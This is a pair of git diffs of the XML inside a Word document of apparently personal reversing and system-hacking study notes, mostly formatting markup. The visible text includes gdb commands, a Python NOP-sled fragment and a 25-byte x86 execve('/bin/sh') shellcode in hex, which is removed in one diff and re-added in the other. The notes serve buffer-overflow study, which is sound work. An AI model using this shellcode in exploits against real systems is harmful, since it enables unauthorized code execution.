--- a/SystemHacking/Reversing.docx
+++ b/SystemHacking/Reversing.docx
@@ -68,7 +68,6 @@
           <w:kern w:val="0"/>
           <w:sz w:val="24"/>
           <w:u w:val="single"/>
-          <w:lang w:eastAsia="ko-Kore-KR"/>
         </w:rPr>
       </w:pPr>
       <w:hyperlink r:id="rId5" w:history="1">
@@ -92,23 +91,72 @@
         <w:autoSpaceDN/>
         <w:jc w:val="left"/>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:wordWrap/>
+        <w:autoSpaceDE/>
+        <w:autoSpaceDN/>
+      </w:pPr>
+      <w:hyperlink r:id="rId6" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a4"/>
+          </w:rPr>
+          <w:t>https://forum.tuts4you.com/</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:wordWrap/>
+        <w:autoSpaceDE/>
+        <w:autoSpaceDN/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:wordWrap/>
+        <w:autoSpaceDE/>
+        <w:autoSpaceDN/>
+        <w:jc w:val="left"/>
+        <w:rPr>
           <w:rFonts w:ascii="Apple SD Gothic Neo" w:eastAsia="Apple SD Gothic Neo" w:hAnsi="Apple SD Gothic Neo" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:color w:val="F41A18"/>
           <w:kern w:val="0"/>
           <w:sz w:val="24"/>
-          <w:lang w:eastAsia="ko-Kore-KR"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:wordWrap/>
-        <w:autoSpaceDE/>
-        <w:autoSpaceDN/>
-        <w:jc w:val="left"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Apple SD Gothic Neo" w:eastAsia="Apple SD Gothic Neo" w:hAnsi="Apple SD Gothic Neo" w:cs="Times New Roman"/>
           <w:b/>
@@ -116,279 +164,8 @@
           <w:color w:val="000000" w:themeColor="text1"/>
           <w:kern w:val="0"/>
           <w:sz w:val="24"/>
-          <w:lang w:eastAsia="ko-Kore-KR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Apple SD Gothic Neo" w:eastAsia="Apple SD Gothic Neo" w:hAnsi="Apple SD Gothic Neo" w:cs="Times New Roman" w:hint="eastAsia"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:lang w:eastAsia="ko-Kore-KR"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Apple SD Gothic Neo" w:eastAsia="Apple SD Gothic Neo" w:hAnsi="Apple SD Gothic Neo" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:lang w:eastAsia="ko-Kore-KR"/>
-        </w:rPr>
-        <w:t>bin/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Apple SD Gothic Neo" w:eastAsia="Apple SD Gothic Neo" w:hAnsi="Apple SD Gothic Neo" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:lang w:eastAsia="ko-Kore-KR"/>
-        </w:rPr>
-        <w:t>sh</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:wordWrap/>
-        <w:autoSpaceDE/>
-        <w:autoSpaceDN/>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Apple SD Gothic Neo" w:eastAsia="Apple SD Gothic Neo" w:hAnsi="Apple SD Gothic Neo" w:cs="Times New Roman" w:hint="eastAsia"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:wordWrap/>
-        <w:autoSpaceDE/>
-        <w:autoSpaceDN/>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t>&lt;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> command &gt; </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t>set disassembly-flavor intel</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a5"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Apple SD Gothic Neo" w:eastAsia="Apple SD Gothic Neo" w:hAnsi="Apple SD Gothic Neo" w:hint="eastAsia"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="27"/>
-          <w:szCs w:val="27"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Apple SD Gothic Neo" w:eastAsia="Apple SD Gothic Neo" w:hAnsi="Apple SD Gothic Neo" w:hint="eastAsia"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="27"/>
-          <w:szCs w:val="27"/>
-        </w:rPr>
-        <w:t>set disable-randomization off</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a5"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Apple SD Gothic Neo" w:eastAsia="Apple SD Gothic Neo" w:hAnsi="Apple SD Gothic Neo"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="27"/>
-          <w:szCs w:val="27"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Apple SD Gothic Neo" w:eastAsia="Apple SD Gothic Neo" w:hAnsi="Apple SD Gothic Neo" w:hint="eastAsia"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="27"/>
-          <w:szCs w:val="27"/>
-        </w:rPr>
-        <w:t>show disable-randomization</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t>d</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t>isas</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> main </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:sym w:font="Wingdings" w:char="F0E0"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> disassemble main</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t>p</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">/d 0x12345 – 0x12323 </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t>( Hex</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> value calculate ) </w:t>
+        </w:rPr>
+        <w:t xml:space="preserve">            </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -488,7 +265,6 @@
         </w:rPr>
         <w:t>ource file name</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -506,7 +282,6 @@
         </w:rPr>
         <w:t>:[</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -785,12 +560,28 @@
     <w:p>
       <w:pPr>
         <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
           <w:lang w:eastAsia="ko-KR"/>
         </w:rPr>
-      </w:pPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                                   </w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -858,25 +649,7 @@
           <w:szCs w:val="30"/>
           <w:lang w:eastAsia="ko-KR"/>
         </w:rPr>
-        <w:t>ython -c “</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t>print(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-        <w:t>‘\x90’ * (size) + ‘\</w:t>
+        <w:t>ython -c “print(‘\x90’ * (size) + ‘\</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1002,7 +775,6 @@
           <w:szCs w:val="30"/>
           <w:lang w:eastAsia="ko-KR"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>&lt;</w:t>
       </w:r>
       <w:r>
@@ -1040,6 +812,24 @@
         </w:rPr>
         <w:t xml:space="preserve"> command </w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>

--- a/SystemHacking/Reversing.docx
+++ b/SystemHacking/Reversing.docx
@@ -105,6 +105,9 @@
         <w:wordWrap/>
         <w:autoSpaceDE/>
         <w:autoSpaceDN/>
+        <w:rPr>
+          <w:lang w:eastAsia="ko-Kore-KR"/>
+        </w:rPr>
       </w:pPr>
       <w:hyperlink r:id="rId6" w:history="1">
         <w:r>
@@ -117,84 +120,32 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:widowControl/>
-        <w:wordWrap/>
-        <w:autoSpaceDE/>
-        <w:autoSpaceDN/>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="0000FF"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:u w:val="single"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:wordWrap/>
-        <w:autoSpaceDE/>
-        <w:autoSpaceDN/>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Apple SD Gothic Neo" w:eastAsia="Apple SD Gothic Neo" w:hAnsi="Apple SD Gothic Neo" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="F41A18"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Apple SD Gothic Neo" w:eastAsia="Apple SD Gothic Neo" w:hAnsi="Apple SD Gothic Neo" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">            </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:pBdr>
           <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
         </w:pBdr>
         <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
           <w:lang w:eastAsia="ko-KR"/>
         </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
         <w:t>r</w:t>
       </w:r>
       <w:r>
@@ -265,6 +216,7 @@
         </w:rPr>
         <w:t>ource file name</w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -282,6 +234,7 @@
         </w:rPr>
         <w:t>:[</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -514,28 +467,342 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:eastAsia="ko-KR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
+        </w:pBdr>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:wordWrap/>
+        <w:adjustRightInd w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="AppleSystemUIFontBold" w:hAnsi="AppleSystemUIFontBold" w:cs="AppleSystemUIFontBold"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="AppleSystemUIFontBold" w:hAnsi="AppleSystemUIFontBold" w:cs="AppleSystemUIFontBold"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>/bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="AppleSystemUIFontBold" w:hAnsi="AppleSystemUIFontBold" w:cs="AppleSystemUIFontBold"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>sh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:wordWrap/>
+        <w:adjustRightInd w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="AppleSystemUIFont" w:hAnsi="AppleSystemUIFont" w:cs="AppleSystemUIFont"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="AppleSystemUIFontBold" w:hAnsi="AppleSystemUIFontBold" w:cs="AppleSystemUIFontBold"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:wordWrap/>
+        <w:adjustRightInd w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="AppleSystemUIFont" w:hAnsi="AppleSystemUIFont" w:cs="AppleSystemUIFont"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:wordWrap/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="40"/>
+        <w:rPr>
+          <w:rFonts w:ascii="AppleSystemUIFontBold" w:hAnsi="AppleSystemUIFontBold" w:cs="AppleSystemUIFontBold"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="AppleSystemUIFontBold" w:hAnsi="AppleSystemUIFontBold" w:cs="AppleSystemUIFontBold"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&lt; command &gt; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:wordWrap/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="40"/>
+        <w:rPr>
+          <w:rFonts w:ascii="AppleSystemUIFontBold" w:hAnsi="AppleSystemUIFontBold" w:cs="AppleSystemUIFontBold"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="AppleSystemUIFontBold" w:hAnsi="AppleSystemUIFontBold" w:cs="AppleSystemUIFontBold"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>set disassembly-flavor intel</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:wordWrap/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="40"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="AppleSystemUIFontBold" w:hAnsi="AppleSystemUIFontBold" w:cs="AppleSystemUIFontBold"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="AppleSystemUIFontBold" w:hAnsi="AppleSystemUIFontBold" w:cs="AppleSystemUIFontBold"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>set disable-randomization off</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:wordWrap/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="40"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="AppleSystemUIFontBold" w:hAnsi="AppleSystemUIFontBold" w:cs="AppleSystemUIFontBold"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="AppleSystemUIFontBold" w:hAnsi="AppleSystemUIFontBold" w:cs="AppleSystemUIFontBold"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>show disable-randomization</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:wordWrap/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="40"/>
+        <w:rPr>
+          <w:rFonts w:ascii="AppleSystemUIFontBold" w:hAnsi="AppleSystemUIFontBold" w:cs="AppleSystemUIFontBold"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="AppleSystemUIFontBold" w:hAnsi="AppleSystemUIFontBold" w:cs="AppleSystemUIFontBold"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>disas</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="AppleSystemUIFontBold" w:hAnsi="AppleSystemUIFontBold" w:cs="AppleSystemUIFontBold"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="AppleSystemUIFontBold" w:hAnsi="AppleSystemUIFontBold" w:cs="AppleSystemUIFontBold"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>main  disassemble</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="AppleSystemUIFontBold" w:hAnsi="AppleSystemUIFontBold" w:cs="AppleSystemUIFontBold"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> main</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:wordWrap/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="40"/>
+        <w:rPr>
+          <w:rFonts w:ascii="AppleSystemUIFontBold" w:hAnsi="AppleSystemUIFontBold" w:cs="AppleSystemUIFontBold"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="AppleSystemUIFontBold" w:hAnsi="AppleSystemUIFontBold" w:cs="AppleSystemUIFontBold"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">p/d 0x12345 – 0x12323 </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="AppleSystemUIFontBold" w:hAnsi="AppleSystemUIFontBold" w:cs="AppleSystemUIFontBold"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>( Hex</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="AppleSystemUIFontBold" w:hAnsi="AppleSystemUIFontBold" w:cs="AppleSystemUIFontBold"/>
+          <w:b/>
+          <w:bCs/>
